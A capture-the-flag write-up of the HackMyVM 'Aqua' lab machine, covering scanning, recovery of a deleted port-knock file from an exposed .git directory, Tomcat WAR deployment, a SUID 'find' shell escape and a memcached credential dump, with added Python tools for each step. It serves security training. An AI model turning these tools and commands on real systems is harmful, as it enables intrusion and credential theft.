HackMyVM Aqua box writeup
Difficulty: Medium
Network scan
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:df:e2:a7, IPv4: 192.168.56.110
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:15 (Unknown: locally administered)
192.168.56.100 08:00:27:76:81:d6 (Unknown)
192.168.56.101 08:00:27:ca:ae:52 (Unknown)
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.862 seconds (137.49 hosts/sec). 3 responded
Port scan
└─# nmap -p- -sC -sV 192.168.56.101
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-24 22:55 EST
Nmap scan report for 192.168.56.101
Host is up (0.0094s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 00:11:32:04:42:e0:7f:98:29:7c:1c:2a:b8:a7:b0:4a (RSA)
| 256 9c:92:93:eb:1c:8f:84:c8:73:af:ed:3b:65:09:e4:89 (ECDSA)
|_ 256 a8:5b:df:d0:7e:31:18:6e:57:e7:dd:6b:d5:89:44:98 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Todo sobre el Agua
|_http-server-header: Apache/2.4.29 (Ubuntu)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open http Apache Tomcat 8.5.5
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5
MAC Address: 08:00:27:CA:AE:52 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.57 seconds
Getting a webshell
The scan shows 21/tcp as filtered rather than closed, so FTP is most likely sitting behind port knocking and we will need the sequence to open it. Let's look at the web app first.
There is a login page, worth a try.
No luck, and brute force doesn't feel like the intended route, so enumerate the directories on port 80 first.
A password-protected zip turns up here, but the password still has to be worked out.
No SQL injection.
Check the image for steganography.
Switching to a different scanner turns up something new: an exposed .git directory.
└─# python3 GitHack.py http://192.168.56.101/SuperCMS/.git/
[+] Download and parse index file ...
[+] README.md
[+] css/main.css
[+] img/img.jpg
[+] index.html
[+] js/login.js
[+] login.html
[OK] index.html
[OK] js/login.js
[OK] css/main.css
[OK] README.md
[OK] login.html
[OK] img/img.jpg
┌──(root㉿LingMj)-[/home/lingmj/xxoo1/GitHack-master]
└─# ls -al
total 32
drwxr-xr-x 4 root root 4096 Jan 24 23:53 .
drwxr-xr-x 11 root root 4096 Jan 24 23:52 ..
drwxr-xr-x 5 root root 4096 Jan 24 23:53 192.168.56.101
-rw-r--r-- 1 root root 4789 May 9 2022 GitHack.py
-rw-r--r-- 1 root root 1172 May 9 2022 README.md
-rw-r--r-- 1 root root 620 Jan 24 23:53 index
drwxr-xr-x 3 root root 4096 Jan 24 23:52 lib
┌──(root㉿LingMj)-[/home/lingmj/xxoo1/GitHack-master]
└─# mv 192.168.56.101 /home/lingmj/xxoo
That version of GitHack only pulls the files listed in the index, not the commit history, so switch to another one.
└─# python2 GitHack.py http://192.168.56.101/SuperCMS/.git
____ _ _ _ _ _
/ ___(_) |_| | | | __ _ ___| | __
| | _| | __| |_| |/ _` |/ __| |/ /
| |_| | | |_| _ | (_| | (__| <
\____|_|\__|_| |_|\__,_|\___|_|\_\{0.0.5}
A '.git' folder disclosure exploit.
[*] Check Depends
[+] Check depends end
[*] Set Paths
[*] Target Url: http://192.168.56.101/SuperCMS/.git/
[*] Initialize Target
[*] Try to Clone straightly
[*] Clone
Cloning into '/home/lingmj/xxoo/GitHack-master/dist/192.168.56.101'...
fatal: repository 'http://192.168.56.101/SuperCMS/.git/' not found
[-] Clone Error
[*] Try to Clone with Directory Listing
[*] http://192.168.56.101/SuperCMS/.git/ is support Directory Listing
[*] Initialize Git
[!] Initialize Git Error: hint: Using 'master' as the name for the initial branch. This default branch name
hint: is subject to change. To configure the initial branch name to use in all
hint: of your new repositories, which will suppress this warning, call:
hint:
hint: git config --global init.defaultBranch <name>
hint:
hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and
hint: 'development'. The just-created branch can be renamed via this command:
hint:
hint: git branch -m <name>
[*] ?C=N;O=D
[*] ?C=M;O=A
[*] ?C=S;O=A
[*] ?C=D;O=A
[*] Try to clone with Cache
[*] Cache files
[*] packed-refs
[*] config
[*] HEAD
[*] COMMIT_EDITMSG
[*] ORIG_HEAD
[*] FETCH_HEAD
[*] refs/heads/master
[*] refs/remote/master
[*] index
[*] logs/HEAD
[*] refs/heads/main
[*] logs/refs/heads/main
[*] Fetch Commit Objects
[*] objects/2e/6cd2656d4e343dbcbc0e59297b9b217656c3a4
[*] objects/85/8e9f9a555b69355c6653fdbaf8313f5544b87b
[*] objects/c3/e76fb1f1bd32996e2549c699b0a4fa528e9a0d
[*] objects/3c/8d5a0eaa9166c7a39c4258f4e978c87ef7b59a
[*] objects/ef/130734c271906490f05c27856388adda62d193
[*] objects/65/e1413b82d1d648982030df2f0a074ab0b2fb0f
[*] objects/f2/ddc62d2c28669444fe6a75aae0f8a1e8a394e3
[*] objects/b3/bf4c0c41c0143d95f04daf4175eb5d72bd571f
[*] objects/86/c7d4bceaf2426b8455112a1fb74096efcc492d
[*] objects/29/631d6592a6d1ff54af273019fdc44798ae610f
[*] objects/ac/5bbd68afc5dc0d528f8e72daf14ab547c4b55a
[*] objects/0a/7f7bae77fbceffca773318badf380fde0b7e41
[*] objects/e7/2325e80888de98eab14cda8fb9d1dc3ffd0b2d
[*] objects/54/e7fc341e5aa8ecea353afa46de20d43ac7f2cd
[*] objects/7c/c5ddf306d952dad4291e6c63cc8452cae63235
[*] objects/f1/59677b7a6fb9090d9f8ba957e7e8a46f5b6df3
[*] objects/71/fcf328b4e83b72fee21decc2f370cef8646a0f
[*] objects/05/8c2c1ec60f3215de4cd2d0158d4c6a22682928
[*] objects/8c/b735a8c51987448f9386406933d0a147a1cb3f
[*] objects/62/096efb6acc0e9c2d64b01d6bdc963f2081912d
[*] objects/de/4b7e451460cae16556cc786fe812155a992087
[*] objects/3b/7e4b8bb0eeb8557fc3ab0b9e7acec16431150a
[*] objects/bd/5a878c5ffeb9125035ed7633d564b9a26e877c
[*] objects/9e/9757718772d622ed20b58f5445cb11d6015f79
[*] objects/58/afe63a1cd28fa167b95bcff50d2f6f011337c1
[*] objects/48/831280c8857ae4f644321279d4a6dc6aec79af
[*] objects/7b/1614729157e934673b9b90ac71a2007cbf2190
[*] objects/84/cdd811cbe5c10d9306017ef009a22833c02069
[*] Fetch Commit Objects End
[*] logs/refs/remote/master
[*] logs/refs/stash
[*] refs/stash
[*] Valid Repository
[+] Valid Repository Success
[+] Clone Success. Dist File : /home/lingmj/xxoo/GitHack-master/dist/192.168.56.101
└─# cat HEAD
ref: refs/heads/main
┌──(root㉿LingMj)-[/home/…/GitHack-master/dist/192.168.56.101/.git]
└─# cd refs/heads
┌──(root㉿LingMj)-[/home/…/192.168.56.101/.git/refs/heads]
└─# ls -al
total 12
drwxr-xr-x 2 root root 4096 Jan 25 00:06 .
drwxr-xr-x 5 root root 4096 Jan 25 00:06 ..
-rw-r--r-- 1 root root 41 Jan 25 00:06 main
┌──(root㉿LingMj)-[/home/…/192.168.56.101/.git/refs/heads]
└─# cat main
2e6cd2656d4e343dbcbc0e59297b9b217656c3a4
┌──(root㉿LingMj)-[/home/…/192.168.56.101/.git/refs/heads]
└─# cd ..
┌──(root㉿LingMj)-[/home/…/dist/192.168.56.101/.git/refs]
└─# cd ..
┌──(root㉿LingMj)-[/home/…/GitHack-master/dist/192.168.56.101/.git]
└─# cd ..
┌──(root㉿LingMj)-[/home/…/xxoo/GitHack-master/dist/192.168.56.101]
└─# git checkout 2e6cd2656d4e343dbcbc0e59297b9b217656c3a4
Note: switching to '2e6cd2656d4e343dbcbc0e59297b9b217656c3a4'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:
git switch -c <new-branch-name>
Or undo this operation with:
git switch -
Turn off this advice by setting config variable advice.detachedHead to false
HEAD is now at 2e6cd26 Add files via upload
└─# git log --oneline
2e6cd26 (HEAD, origin/main, main) Add files via upload
c3e76fb Delete login.html
ac5bbd6 Update index.html
f159677 Update README.md
8cb735a Add files via upload
3b7e4b8 Delete knocking_on_Atlantis_door.txt
58afe63 Create knocking_on_Atlantis_door.txt
7b16147 Initial commit
┌──(root㉿LingMj)-[/home/…/xxoo/GitHack-master/dist/192.168.56.101]
└─# git checkout 58afe63 -- knocking_on_Atlantis_door.txt
┌──(root㉿LingMj)-[/home/…/xxoo/GitHack-master/dist/192.168.56.101]
└─# ls -al
total 40
drwxr-xr-x 6 root root 4096 Jan 25 00:12 .
drwxr-xr-x 3 root root 4096 Jan 25 00:06 ..
drwxr-xr-x 9 root root 4096 Jan 25 00:12 .git
-rw-r--r-- 1 root root 37 Jan 25 00:06 README.md
drwxr-xr-x 2 root root 4096 Jan 25 00:06 css
drwxr-xr-x 2 root root 4096 Jan 25 00:06 img
-rw-r--r-- 1 root root 799 Jan 25 00:06 index.html
drwxr-xr-x 2 root root 4096 Jan 25 00:06 js
-rw-r--r-- 1 root root 94 Jan 25 00:12 knocking_on_Atlantis_door.txt
-rw-r--r-- 1 root root 1878 Jan 25 00:06 login.html
┌──(root㉿LingMj)-[/home/…/xxoo/GitHack-master/dist/192.168.56.101]
└─# cat knocking_on_Atlantis_door.txt
Para abrir las puertas esta es la secuencia
(☞゚ヮ゚)☞ 1100,800,666 ☜(゚ヮ゚☜)
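To make clear what GitHack and the git commands above are actually doing, here is an added example (my own code, not from the original writeup or the GitHack project) that reads a .git directory directly: it inflates the loose objects, walks the commit chain from HEAD, compares consecutive trees to spot files that were deleted, and pulls their content back out of objects/. That is exactly why knocking_on_Atlantis_door.txt is still recoverable after the "Delete" commit: git never removed the blob. It only looks at top-level tree entries and loose objects (no subdirectories, no packfiles), which is enough for a small leaked repo like this one. The repository it builds to run against is a constructed fixture with made-up contents, not the target's repository.

```python
import hashlib
import os
import tempfile
import zlib


def _obj_path(git_dir, sha):
    return os.path.join(git_dir, "objects", sha[:2], sha[2:])


def read_object(git_dir, sha):
    """Inflate a loose object and split off its '<type> <size>\\0' header."""
    with open(_obj_path(git_dir, sha), "rb") as f:
        raw = zlib.decompress(f.read())
    header, _, body = raw.partition(b"\0")
    return header.split(b" ")[0].decode(), body


def parse_tree(body):
    """Tree entries are '<mode> <name>\\0<20 raw sha bytes>' back to back."""
    entries, i = {}, 0
    while i < len(body):
        nul = body.index(b"\0", i)
        mode, name = body[i:nul].decode().split(" ", 1)
        entries[name] = (mode, body[nul + 1:nul + 21].hex())
        i = nul + 21
    return entries


def parse_commit(body):
    """Return (tree sha, parent shas, message) from a commit object body."""
    head, _, message = body.partition(b"\n\n")
    tree, parents = None, []
    for line in head.decode().splitlines():
        key, _, value = line.partition(" ")
        if key == "tree":
            tree = value
        elif key == "parent":
            parents.append(value)
    return tree, parents, message.decode().strip()


def resolve_head(git_dir):
    with open(os.path.join(git_dir, "HEAD")) as f:
        ref = f.read().strip()
    if ref.startswith("ref: "):
        with open(os.path.join(git_dir, ref[5:])) as f:
            return f.read().strip()
    return ref


def walk_history(git_dir):
    """Follow first parents from HEAD; [(sha, tree_sha, message)], newest first."""
    history, sha = [], resolve_head(git_dir)
    while sha:
        kind, body = read_object(git_dir, sha)
        assert kind == "commit", sha
        tree, parents, message = parse_commit(body)
        history.append((sha, tree, message))
        sha = parents[0] if parents else None
    return history


def recover_deleted(git_dir):
    """Top-level files present in a commit but gone in its successor, with content."""
    history = walk_history(git_dir)
    recovered = {}
    for newer, older in zip(history, history[1:]):
        new_tree = parse_tree(read_object(git_dir, newer[1])[1])
        old_tree = parse_tree(read_object(git_dir, older[1])[1])
        for name, (_, blob_sha) in old_tree.items():
            if name not in new_tree and name not in recovered:
                recovered[name] = read_object(git_dir, blob_sha)[1]
    return recovered


# ---- constructed fixture: a tiny repo with the same create/delete pattern ----
def _write_object(git_dir, kind, data):
    raw = f"{kind} {len(data)}\0".encode() + data
    sha = hashlib.sha1(raw).hexdigest()
    os.makedirs(os.path.dirname(_obj_path(git_dir, sha)), exist_ok=True)
    with open(_obj_path(git_dir, sha), "wb") as f:
        f.write(zlib.compress(raw))
    return sha


def build_sample_repo(root):
    git_dir = os.path.join(root, ".git")
    os.makedirs(os.path.join(git_dir, "refs", "heads"))

    def commit(files, message, parent):
        tree = b"".join(
            b"100644 " + name.encode() + b"\0" + bytes.fromhex(_write_object(git_dir, "blob", data))
            for name, data in sorted(files.items()))
        tree_sha = _write_object(git_dir, "tree", tree)
        lines = [f"tree {tree_sha}"] + ([f"parent {parent}"] if parent else [])
        lines += ["author x <x@x> 0 +0000", "committer x <x@x> 0 +0000", "", message]
        return _write_object(git_dir, "commit", "\n".join(lines).encode() + b"\n")

    base = {"README.md": b"# SuperCMS\n"}
    c1 = commit(base, "Initial commit", None)
    c2 = commit({**base, "knocking_on_Atlantis_door.txt": b"1100,800,666\n"},
                "Create knocking_on_Atlantis_door.txt", c1)
    c3 = commit(base, "Delete knocking_on_Atlantis_door.txt", c2)
    with open(os.path.join(git_dir, "refs", "heads", "main"), "w") as f:
        f.write(c3 + "\n")
    with open(os.path.join(git_dir, "HEAD"), "w") as f:
        f.write("ref: refs/heads/main\n")
    return git_dir


def demo():
    """Build the fixture in a temp dir, then log it and recover the deleted file."""
    git_dir = build_sample_repo(tempfile.mkdtemp())
    return {"log": [m for _, _, m in walk_history(git_dir)],
            "recovered": recover_deleted(git_dir)}


if __name__ == "__main__":
    print(demo())
```

Against the real download you would point walk_history and recover_deleted at dist/192.168.56.101/.git; with git installed, git log --diff-filter=D --name-only and git checkout <commit> -- <file> do the same job, as above.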
I'm not very familiar with git, so I leaned on GPT to work through the commands; that gave me the ports the knock sequence needs.
I didn't have knock installed here, so I had to install it first.
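An added example (not from the original writeup) of turning the recovered hint into an actual knock: it pulls the ports out of the kaomoji line, sends one TCP connect per port in order, and then checks whether 21/tcp has opened. HINT is the line from the recovered file; the target address and the 0.3 s spacing between knocks are my assumptions. The equivalent with the knock client is knock 192.168.56.101 1100 800 666 followed by nmap -p21 192.168.56.101.

```python
import re
import socket
import time

# Line from the recovered knocking_on_Atlantis_door.txt
HINT = "(☞゚ヮ゚)☞ 1100,800,666 ☜(゚ヮ゚☜)"


def parse_knock_sequence(text):
    """Extract the comma-separated port list, ignoring the decoration around it."""
    m = re.search(r"\d+(?:\s*,\s*\d+)+", text)
    if not m:
        raise ValueError("no port sequence found")
    ports = [int(p) for p in m.group(0).split(",")]
    bad = [p for p in ports if not 0 < p < 65536]
    if bad:
        raise ValueError(f"invalid ports: {bad}")
    return ports


def knock(host, ports, delay=0.3, timeout=0.5):
    """TCP-knock each port in order. knockd only needs to see the SYN, so a
    refused or timed-out connect on a closed port is the expected outcome."""
    for p in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, p))
        except OSError:
            pass
        finally:
            s.close()
        time.sleep(delay)
    return ports


def is_open(host, port, timeout=2):
    """True if a full TCP connect to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def open_door(host, hint=HINT, target_port=21):
    """Knock with the sequence from the hint, then report whether the door opened."""
    sequence = parse_knock_sequence(hint)
    knock(host, sequence)
    return is_open(host, target_port)


if __name__ == "__main__":
    # Target address is an assumption taken from the scan above
    print("21/tcp open after knocking:", open_door("192.168.56.101"))
```

knockd requires the ports in the configured order within its sequence timeout, so keep the delay short; if 21/tcp still shows filtered afterwards, the usual suspects are a wrong order or a stale half-sequence from an earlier attempt.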
The zip asks for a password. Recall the earlier hint, 1=2 = passwd_zip, so the password should be agua=H2O.
It extracts successfully.
Inside are the Tomcat user credentials.
Next we need a WAR file to deploy on Tomcat; a reverse shell can be packaged into one.
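Added example (my own code, not the author's) of the packaging step: it builds a minimal WAR in memory and pushes it through the Tomcat manager's text interface, which is what a WAR deployment on this Tomcat 8.5.5 would use. The JSP inside is a deliberately harmless, constructed placeholder; the author used a reverse-shell JSP instead, whose contents are not on the page. USER and PASS stand in for the credentials recovered from the zip, and deployment through /manager/text requires that account to hold the manager-script role.

```python
import base64
import io
import urllib.request
import zipfile

WEB_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1"></web-app>
"""

# Constructed, harmless JSP so the packaging can be checked offline.
SAMPLE_JSP = b"""<%@ page import="java.net.InetAddress" %>
<%= "deployed on " + InetAddress.getLocalHost().getHostName() %>
"""


def build_war(jsp_source, jsp_name="index.jsp"):
    """Return the bytes of a WAR: a zip holding WEB-INF/web.xml plus one JSP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("WEB-INF/web.xml", WEB_XML)
        z.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes):
    """Sorted list of member names, to sanity-check the archive before upload."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as z:
        return sorted(z.namelist())


def _auth(user, password):
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def deploy_war(base_url, user, password, context, war_bytes, timeout=10):
    """PUT the WAR to the manager text API; returns its one-line status,
    e.g. 'OK - Deployed application at context path /probe'."""
    req = urllib.request.Request(
        f"{base_url}/manager/text/deploy?path={context}&update=true",
        data=war_bytes, method="PUT",
        headers={"Authorization": _auth(user, password),
                 "Content-Type": "application/octet-stream"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode().strip()


def list_apps(base_url, user, password, timeout=10):
    """Deployed contexts, so you can confirm the upload and later undeploy it."""
    req = urllib.request.Request(f"{base_url}/manager/text/list",
                                 headers={"Authorization": _auth(user, password)})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode()


if __name__ == "__main__":
    # USER/PASS are placeholders for the credentials found in tomcat-users.xml
    war = build_war(SAMPLE_JSP)
    print(deploy_war("http://192.168.56.101:8080", "USER", "PASS", "/probe", war))
    print(list_apps("http://192.168.56.101:8080", "USER", "PASS"))
    # the JSP is then reachable at http://192.168.56.101:8080/probe/index.jsp
```

If the manager answers 403 with valid credentials, the account has manager-gui but not manager-script; the HTML upload form under /manager/html is the fallback in that case.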
Privilege escalation
cat .bash_history
sudo -l
ps aux
nc 127.0.0.1 11211
su tridente
cd
ll
ls -la
cd conf
ls
cat tomcat-users.xml
exit
reset
export TERM=xterm
export SHELL=bash
stty rows 51 columns 238
nano
id
ls -la
cd home
ls .lka
ls .la
ls -la
cd tridente
ls -al
cat user.txt
.find
./find
./find . -exec /bin/bash \; -quit
ls
exit
reset
export TERM=xterm
export SHELL=bash
stty rows 37 columns 165
ls -la
cd home
ls
cd tridente/
ls -la
./find
./find . -exec /bin/sh \; -quit
sudo -l
ls
cat user.txt
cat .bash_history
ps aux
nc 127.0.0.1 11211
su tridente
su tridente
exit
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 57 columns 212
nano
stty rows 42 columns 159
nano
ls -la
cd home
ls -la
sudo -l
cd tridente
ls -la
find . -exec /bin/sh \; -quit
ls -la
cd /
find / -perm -4000 2>/dev/null
COMMAND=whoami
echo "$COMMAND" | at now
sh
ls -al
ls
ps aux
nc localhost 11211
This history already lays out most of the route (memcached on 11211, su to tridente), but it never shows the password, so that still has to be found.
stats cachedump
CLIENT_ERROR bad command line
stats items
STAT items:1:number 5
STAT items:1:number_hot 1
STAT items:1:number_warm 0
STAT items:1:number_cold 4
STAT items:1:age_hot 0
STAT items:1:age_warm 0
STAT items:1:age 0
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:evicted_active 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 80
STAT items:1:lrutail_reflocked 0
STAT items:1:moves_to_cold 53758
STAT items:1:moves_to_warm 0
STAT items:1:moves_within_lru 0
STAT items:1:direct_reclaims 0
STAT items:1:hits_to_hot 0
STAT items:1:hits_to_warm 0
STAT items:1:hits_to_cold 0
STAT items:1:hits_to_temp 0
END
stats cachedump 1 0
ITEM id [4 b; 0 s]
ITEM email [17 b; 0 s]
ITEM Name [14 b; 0 s]
ITEM password [18 b; 0 s]
ITEM username [8 b; 0 s]
END
get username
VALUE username 0 8
tridente
END
get password
VALUE password 0 18
N3ptun0D10sd3lM4r$
END
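The session above pokes memcached by hand; here is an added example (not from the original post) that does the whole dump in one go: enumerate the slab classes from stats items, list each slab's keys with stats cachedump <slab> 0 (a limit of 0 means no limit, which is why the bare stats cachedump above was rejected), then get every key. The sample replies embedded for the offline check are copied from the output shown above. memcached here listens on 127.0.0.1 only, so run this from the foothold or through a port forward.

```python
import re
import socket


def _recv_reply(sock):
    """Read one text-protocol reply: everything up to END, or a single error line."""
    buf = b""
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
        if buf.endswith(b"END\r\n"):
            break
        if buf.startswith((b"ERROR", b"CLIENT_ERROR", b"SERVER_ERROR")) and buf.endswith(b"\r\n"):
            break
    return buf


def command(sock, line):
    sock.sendall(line + b"\r\n")
    return _recv_reply(sock)


def slab_ids(stats_items_reply):
    """Slab classes that currently hold items, from a 'stats items' reply."""
    return sorted({int(s) for s in re.findall(rb"^STAT items:(\d+):", stats_items_reply, re.M)})


def cachedump_keys(cachedump_reply):
    """Key names from a 'stats cachedump <slab> <limit>' reply."""
    return [k.decode() for k in re.findall(rb"^ITEM (\S+) \[", cachedump_reply, re.M)]


def get_value(get_reply):
    """Raw value bytes from a 'get <key>' reply, or None if the key is absent."""
    m = re.search(rb"^VALUE \S+ \d+ (\d+)\r\n", get_reply, re.M)
    if not m:
        return None
    length = int(m.group(1))
    return get_reply[m.end():m.end() + length]


def dump_all(host="127.0.0.1", port=11211, timeout=3):
    """Walk every slab class, list its keys, and fetch each value."""
    found = {}
    with socket.create_connection((host, port), timeout=timeout) as s:
        for slab in slab_ids(command(s, b"stats items")):
            for key in cachedump_keys(command(s, b"stats cachedump %d 0" % slab)):
                found[key] = get_value(command(s, b"get " + key.encode()))
    return found


# Replies copied from the session above, for checking the parsers offline
SAMPLE_STATS = b"STAT items:1:number 5\r\nSTAT items:1:number_hot 1\r\nSTAT items:1:age 0\r\nEND\r\n"
SAMPLE_DUMP = (b"ITEM id [4 b; 0 s]\r\nITEM email [17 b; 0 s]\r\nITEM Name [14 b; 0 s]\r\n"
               b"ITEM password [18 b; 0 s]\r\nITEM username [8 b; 0 s]\r\nEND\r\n")
SAMPLE_GET = b"VALUE password 0 18\r\nN3ptun0D10sd3lM4r$\r\nEND\r\n"

if __name__ == "__main__":
    for key, value in dump_all().items():
        print(key, value)
```

stats cachedump only returns a bounded slice of each slab's keys, so on a busier instance prefer lru_crawler metadump all (memcached 1.4.31 and later), which lists every key regardless of slab.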
There is also a gpg step in there, which is a pain.
And that's the box done.
userflag:f506a6ee37275430ac07caa95914aeba
rootflag:e16957fbc9202932b1dc7fe3e10a197e
This post is licensed under CC BY 4.0 by the author.